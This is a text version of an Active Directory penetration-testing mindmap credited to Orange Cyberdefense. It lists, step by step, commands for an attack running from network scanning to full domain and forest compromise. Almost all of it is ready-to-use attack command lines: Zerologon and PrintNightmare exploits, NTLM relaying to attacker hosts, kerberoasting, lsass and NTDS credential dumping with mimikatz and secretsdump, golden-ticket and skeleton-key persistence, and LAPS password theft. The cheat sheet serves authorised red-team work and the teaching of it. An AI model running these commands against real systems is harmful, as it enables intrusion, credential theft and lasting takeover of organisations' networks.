  1. Scan Network
    1. cme smb <ip_range> # enumerate smb hosts
    2. nmap -sn <ip_range> # ping scan (-sP is the old name of -sn; it takes no -p)
    3. nmap -Pn -sV --top-ports 50 --open <ip> # quick scan
    4. nmap -Pn --script smb-vuln* -p139,445 <ip> # search smb vuln
    5. nmap -Pn -sC -sV <ip> # classic scan
    6. nmap -Pn -sC -sV -p- <ip> # full scan
    7. nmap -sU -sC -sV <ip> # udp scan
    8. find vulnerable host
  2. find AD IP
    1. nmcli dev show eth0 # show domain name & dns
    2. nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain> # locate domain controllers via the SRV record
  3. zone transfer
    1. dig axfr <domain_name> @<name_server>
  4. List guest access on smb share
    1. enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
    2. smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
    3. smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
    4. cme smb <ip> -u '' -p '' # enumerate null session
    5. cme smb <ip> -u 'a' -p '' # enumerate anonymous access
  5. Enumerate ldap
    1. nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>
    2. ldapsearch -x -h <ip> -s base
    3. user found
  6. Find user list
    1. enum4linux -U <dc-ip> | grep 'user:'
    2. crackmapexec smb <ip> -u <user> -p '<password>' --users
    3. OSINT - enumerate username on internet
      1. nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
    4. user found
  7. relay/poisoning
    1. find smb not signed
      1. nmap -Pn -sS -T4 --open --script smb-security-mode -p445 ADDRESS/MASK
      2. use exploit/windows/smb/smb_relay
      3. cme smb $hosts --gen-relay-list relay.txt
      4. unsigned SMB
    2. PetitPotam.py -d <domain> <listener_ip> <target_ip>
    3. responder -I eth0
    4. mitm6 -d <domain>
    5. user & hash found
  8. zerologon
    1. python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>
    2. secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator"
    3. secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>
    4. python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS> # restore the machine account password afterwards
  9. mayfly (@M4yFly)
  10. Got one account on the domain
    1. Get all users
      1. GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
    2. enumerate SMB share
      1. cme smb <ip> -u <user> -p <password> --shares
    3. bloodhound
      1. bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
    4. powerview / pywerview
    5. kerberoasting
      1. Get hash
        1. GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
        2. Rubeus kerberoast
        3. hash found
      2. Get kerberoastable users
        1. Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
        2. MATCH (u:User {hasspn:true}) RETURN u
        3. MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
    6. MS14-068
      1. FindSMB2UPTime.py <ip>
        1. rpcclient $> lookupnames <name>
        2. wmic useraccount get name,sid
        3. auxiliary/admin/kerberos/ms14_068_kerberos_checksum
        4. goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
          1. kerberos::ptc "<ticket>"
    7. dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user
      1. sc \\DNSServer stop dns && sc \\DNSServer start dns
    8. PrintNightmare
      1. CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'
    9. enum dns
      1. dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>
  11. Got valid username
    1. Password spray
      1. Get password policy
        1. crackmapexec smb <IP> -u 'user' -p 'password' --pass-pol
        2. enum4linux -u 'username' -p 'password' -P <IP>
      2. cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce # test user=password
      3. cme smb <dc-ip> -u user.txt -p password.txt # multiple tests (careful of the lockout policy)
      4. credentials found
    2. ASREPRoast
      1. Get hash
        1. python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
        2. Rubeus asreproast /format:hashcat
      2. Get ASREPRoastable users
        1. Get-DomainUser -PreauthNotRequired -Properties SamAccountName
        2. MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
      3. hash found
  12. Lateral move
    1. pass the hash
      1. psexec.py -hashes ":<hash>" <user>@<ip>
      2. wmiexec.py -hashes ":<hash>" <user>@<ip>
      3. atexec.py -hashes ":<hash>" <user>@<ip> "command"
      4. evil-winrm -i <ip>/<domain> -u <user> -H <hash>
      5. xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
    2. overpass the hash / pass the key (PTK)
      1. python getTGT.py <domain>/<user> -hashes :<hashes>
        1. export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
          1. python psexec.py <domain>/<user>@<ip> -k -no-pass
      2. Rubeus asktgt /user:victim /rc4:<rc4value>
        1. Rubeus ptt /ticket:<ticket>
        2. Rubeus createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe]
          1. Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
    3. Unconstrained delegation
      1. Get tickets
        1. mimikatz "privilege::debug" "sekurlsa::tickets /export"
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get unconstrained delegation machines
        1. Get-NetComputer -Unconstrained
        2. Get-DomainComputer -Unconstrained -Properties DnsHostName
        3. MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
        4. MATCH (u:User {owned:true}), (c:Computer {unconstraineddelegation:true}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    4. Constrained delegation
      1. Get tickets
        1. mimikatz "privilege::debug" "sekurlsa::tickets /export"
        2. Rubeus dump /service:krbtgt /nowrap
        3. Rubeus dump /luid:0xdeadbeef /nowrap
      2. Get constrained delegation machines
        1. Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
        2. MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) RETURN p
        3. MATCH (u:User {owned:true}), (c:Computer {name: "<MYTARGET.FQDN>"}), p=shortestPath((u)-[*1..]->(c)) RETURN p
    5. Resource-Based Constrained Delegation
    6. dcsync
      1. lsadump::dcsync /domain:htb.local /user:krbtgt # Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts
    7. WSUSpect
      1. WSUSpendu.ps1 # need compromised WSUS server
    8. sccm
      1. CMPivot
    9. MSSQL Trusted Links
      1. use exploit/windows/mssql/mssql_linkcrawler
    10. Printers spooler service abuse
      1. rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
        1. printerbug.py '<domain>/<username>:<password>'@<Printer IP> <RESPONDERIP>
    11. AD acl abuse
      1. aclpwn.py
        1. GenericAll on User
        2. GenericAll on Group
        3. GenericAll / GenericWrite / Write on Computer
        4. WriteProperty on Group
        5. Self (Self-Membership) on Group
        6. WriteProperty (Self-Membership)
        7. ForceChangePassword
        8. WriteOwner on Group
        9. GenericWrite on User
        10. WriteDACL + WriteOwner
    12. GPO Delegation
    13. get laps passwords
      1. Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
      2. foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
    14. privexchange
      1. python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>
        1. ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>
    15. ADCS
  13. Kindly provided by Orange Cyberdefense ;-) Some commands can break stuff, be sure to know what you are doing! Please find the legend below.
  14. Bloodhound
  15. PowerView
  16. find hash
    1. crack hash
      1. LM
        1. john --format=lm hash.txt
        2. hashcat -m 3000 -a 3 hash.txt
      2. NTLM
        1. john --format=nt hash.txt
        2. hashcat -m 1000 -a 3 hash.txt
      3. NTLMv1
        1. john --format=netntlm hash.txt
        2. hashcat -m 5500 -a 3 hash.txt
      4. NTLMv2
        1. john --format=netntlmv2 hash.txt
        2. hashcat -m 5600 -a 0 hash.txt rockyou.txt
      5. Kerberos 5 TGS
        1. john spn.txt --format=krb5tgs --wordlist=rockyou.txt
        2. hashcat -m 13100 -a 0 spn.txt rockyou.txt
      6. Kerberos ASREP
        1. hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.txt
  17. relay
    1. MS08-068
      1. use exploit/windows/smb/smb_relay # Windows 2000 / Windows Server 2008
    2. responder -I eth0 # disable smb & http
      1. ntlmrelayx.py -tf targets.txt
    3. mitm6 -i eth0 -d <domain>
      1. ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp -socks -debug
      2. ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
      3. ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
        1. getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
    4. adcs
      1. ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
        1. Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
  18. Domain admin
    1. dump ntds.dit
      1. crackmapexec smb 127.0.0.1 -u <user> -p <password> -d <domain> --ntds
      2. secretsdump.py '<domain>/<user>:<pass>'@<ip>
      3. ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
        1. secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
      4. windows/gather/credentials/domain_hashdump
  19. Persistence
    1. net group "domain admins" myuser /add /domain
    2. Golden ticket
      1. ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
    3. Silver Ticket
    4. DSRM
      1. PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
    5. Skeleton Key
      1. mimikatz "privilege::debug" "misc::skeleton" "exit"
    6. Custom SSP
      1. mimikatz "privilege::debug" "misc::memssp" "exit"
        1. C:\Windows\System32\kiwissp.log
    7. ...
  20. Administrator access
    1. get credentials
      1. procdump.exe -accepteula -ma lsass.exe lsass.dmp
        1. mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
      2. mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
      3. post/windows/gather/smart_hashdump
        1. hashdump
      4. cme smb <ip_range> -u <user> -p <password> -M lsassy
      5. cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds
    2. LSA as a Protected Process
      1. PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
      2. mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" #with mimidriver.sys
    3. search password files
      1. findstr /si 'password' *.txt *.xml *.docx
    4. search stored password
      1. lazagne.exe all
    5. shadow copies
      1. diskshadow list shadows all
        1. mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
    6. token manipulation
      1. .\incognito.exe list_tokens -u
        1. .\incognito.exe execute -c "<domain>\<user>" powershell.exe
      2. use incognito
        1. impersonate_token <domain>\\<user>
    7. dpapi extract
  21. Low hanging fruit
    1. java rmi
      1. exploit/multi/misc/java_rmi_server
    2. ms17-010
      1. exploit/windows/smb/ms17_010_eternalblue
    3. tomcat/jboss manager
      1. auxiliary/scanner/http/tomcat_enum
      2. exploit/multi/http/tomcat_mgr_deploy
    4. java serialized port
      1. ysoserial
    5. vulnerable product with cve
      1. searchsploit
    6. MS14-025
      1. use scanner/smb/smb_enum_gpp
      2. findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
    7. database credentials
      1. use admin/mssql/mssql_enum_sql_logins
    8. proxylogon
    9. proxyshell
  22. Low access
    1. winpeas.exe
    2. search password files
      1. findstr /si 'password' *.txt *.xml *.docx
    3. Juicy Potato / Lovely Potato
    4. PrintSpoofer
    5. RoguePotato
    6. SMBGhost CVE-2020-0796
    7. CVE-2021-36934 (HiveNightmare/SeriousSAM)
    8. ...
  23. Trust relationship
    1. Child Domain to Forest Compromise - SID Hijacking
      1. Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData|select objectsid
        1. mimikatz lsadump::trust
          1. kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt
    2. Forest to Forest Compromise - Trust Ticket
      1. "lsadump::trust /patch" "lsadump::lsa /patch"
        1. "kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_SID> /rc4:<trust_key> /service:krbtgt /target:<target_domain> /ticket:<golden_ticket_path>"
          1. .\Rubeus.exe asktgs /ticket:<kirbi file> /service:"Service's SPN" /ptt
    3. Breaking forest trust
      1. printerbug or petitpotam to force the DC of the external forest to connect to a local unconstrained delegation machine. Capture the TGT, inject it into memory and dcsync